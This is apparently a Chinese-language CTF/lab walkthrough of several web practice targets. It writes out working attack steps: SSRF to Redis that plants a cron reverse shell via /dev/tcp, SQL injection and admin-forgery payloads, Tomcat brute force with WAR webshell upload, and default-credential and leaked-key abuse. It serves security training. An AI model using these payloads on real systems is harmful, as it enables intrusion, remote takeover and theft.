Web安全靶场实战教学文档

目录

1. Web1靶场解析
2. Web2靶场解析
3. Web3靶场解析
4. Web5靶场解析
5. Web6靶场解析
6. Web7靶场解析
7. Web9靶场解析

Web1

FLAG1：文件读取漏洞

攻击路径：

• 直接读取根目录下的flag文件
• 获取flag：meetsec1{6d5e5c2bb397ba7727b58df59b35f66a}

技术要点：

• 文件读取漏洞通常通过路径遍历或直接文件访问实现
• 在Web应用中，可通过构造特殊URL或参数读取服务器文件

FLAG2：SSRF+Redis未授权访问

攻击步骤：

1. 使用file:///etc/hosts查看内网主机连接
2. 发现内网C段：172.18.240.0/24
3. 使用Yakit进行IP和端口探测
4. 优先探测Redis默认端口6379
5. 发现172.18.240.1和172.18.240.7的6379端口开放
6. 使用dict协议查询Redis键：

   dict://172.18.240.1:6379/keys *
   dict://172.18.240.7:6379/keys *
   

7. 在172.18.240.7上发现flag，直接GET获取
   • flag：meetsec2{2b7cc5b73fe867cc83546583b858c8ab}

技术要点：

• SSRF(Server-Side Request Forgery)漏洞利用
• Redis未授权访问漏洞
• 内网探测技术
• dict协议在SSRF中的应用

FLAG3：Redis写定时任务反弹shell

攻击步骤：

1. 清空Redis数据库：dict://172.18.240.7:6379/flushall
2. 设置Redis备份目录为定时任务目录：dict://172.18.240.7:6379/config set dir /var/spool/cron
3. 设置备份文件名为root：dict://172.18.240.7:6379/config set dbfilename root
4. 写入反弹shell命令：

   dict://172.18.240.7:6379/set x "\n* * * * * /bin/bash -i >& /dev/tcp/IP/5555 0>&1\n"
   

5. 保存配置：dict://172.18.240.7:6379/save
6. 获取flag：meetsec3{f22eec9fb7c498b3a747392ff53a746b}

技术要点：

• Redis未授权写入定时任务
• 反弹shell技术
• Linux定时任务(crontab)利用

Web2

FLAG1：Weblogic漏洞利用

攻击路径：

• 使用weblogicTool工具直接利用
• 获取flag：meetsec1{3e942fd37767def3a9f68cf5ee6ebee5}

技术要点：

• Weblogic常见漏洞利用
• 自动化工具使用

FLAG2：内存马+数据库信息泄露

攻击步骤：

1. 注入冰蝎内存马
2. 使用Fscan收集信息
3. 在以下路径找到数据库配置文件：

   /root/Oracle/Middleware/user_projects/domains/base_domain/config/jdbc/JDBC_Data_Source-0-3407-jdbc.xml
   

4. 获取用户名root和AES加密密码
5. 找到SerializedSystemIni.dat文件：

   /root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat
   

6. 解密得到密码：Meetsec#1024
7. 使用stowaway代理，通过DataGrip连接数据库
8. 获取flag：meetsec2{9fffac75c84bfc66fef4998f3574c6c8}

技术要点：

• Java内存马技术
• Weblogic配置文件路径
• AES加密密码解密
• 数据库连接技术

FLAG3：文件读取

• 直接读取根目录下的flag文件
• flag：meetsec3{2e947aef43be6dc428a9c626ba7fb824}

Web3

FLAG1：Actuator信息泄露

攻击路径：

1. 扫描发现/actuator/env和/actuator/heapdump端点
2. 访问/actuator/env直接获取flag
3. 或通过分析heapdump文件：

   java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
   

4. 获取flag：meetsec1{e20cdd96b8985a3557e5720726bb09a8}

技术要点：

• Spring Boot Actuator端点信息泄露
• Heapdump文件分析技术

FLAG2：数据库凭证泄露

攻击路径：

1. 从heapdump中找到数据库连接信息：

   com.zaxxer.hikari.HikariDataSource: [
     password = MeetSec@2nd!2022,
     jdbcUrl = jdbc:mysql://mysql_heapdump:13306/db,
     username = meetsec
   ]
   

2. 获取flag：meetsec2{9edbd4b03b5f86a9abe079bc63ea847b}

技术要点：

• 内存数据提取技术
• 数据库连接字符串分析

Web5

FLAG1：SQL注入+后台利用

攻击步骤：

1. 访问/admin/login.php后台登录界面
2. 使用报错注入获取数据库名：

   ' anselectd extractvalue(1,concat(0x7e,(database()))) #
   

3. 伪造管理员登录：

   ' uniselecton+selselectect+1,'admin','e10adc3949ba59abbe56e057f20f883e',0,0 #
   

   (使用MD5加密的密码e10adc3949ba59abbe56e057f20f883e，对应明文123456)
4. 在系统设置中添加php后缀
5. 访问上传接口：http://[target]/admin/admin_file_upload.php
6. 获取flag：meetsec1{476e2dceb225678cd466fc3cd2b4c59c}

技术要点：

• SQL报错注入技术
• 管理员账户伪造
• 文件上传漏洞利用

Web6

FLAG1：Tomcat弱口令+war包部署

攻击步骤：

1. 发现Basic认证
2. 构造用户名:密码字典，格式为用户名:密码
3. 使用Burp Suite爆破，Base64编码传输
4. 爆破出凭证：tomcat:qwe123
5. 访问/manager/html
6. 使用冰蝎生成一句话木马，打包为zip后改后缀为war
7. 上传war包获取webshell
8. 获取flag：meetsec1{c7a8d2734ec5a4ed687a9a692ee733f8}

技术要点：

• Basic认证爆破技术
• Tomcat管理界面利用
• war包恶意代码部署

Web7

FLAG1：LiqunKit工具利用

• 直接使用LiqunKit工具利用
• 获取flag：meetsec1{672728e3bde3f4cc2b59de572b4df6d6}

技术要点：

• 综合漏洞利用工具使用

Web9

FLAG1：Nacos默认凭证+Shiro key泄露

攻击步骤：

1. 识别为Nacos框架
2. 使用默认凭证登录：nacos:nacos
3. 发现Shiro key：JG/RsuIKp3DFaBfD3ctgeA==
4. 获取flag：meetsec1{97fde43b8e55cb2e2b26b7c232ea82fa}

技术要点：

• Nacos默认凭证利用
• Shiro框架安全风险
• 密钥泄露利用

总结

本教学文档详细分析了多个Web靶场的攻击路径和技术要点，涵盖了：

• 文件读取漏洞
• SSRF与Redis利用
• Weblogic漏洞
• Spring Boot信息泄露
• SQL注入
• Tomcat弱口令
• 综合工具利用
• 默认凭证风险

每种攻击技术都提供了具体的操作步骤和关键命令，可作为Web安全学习的实战参考。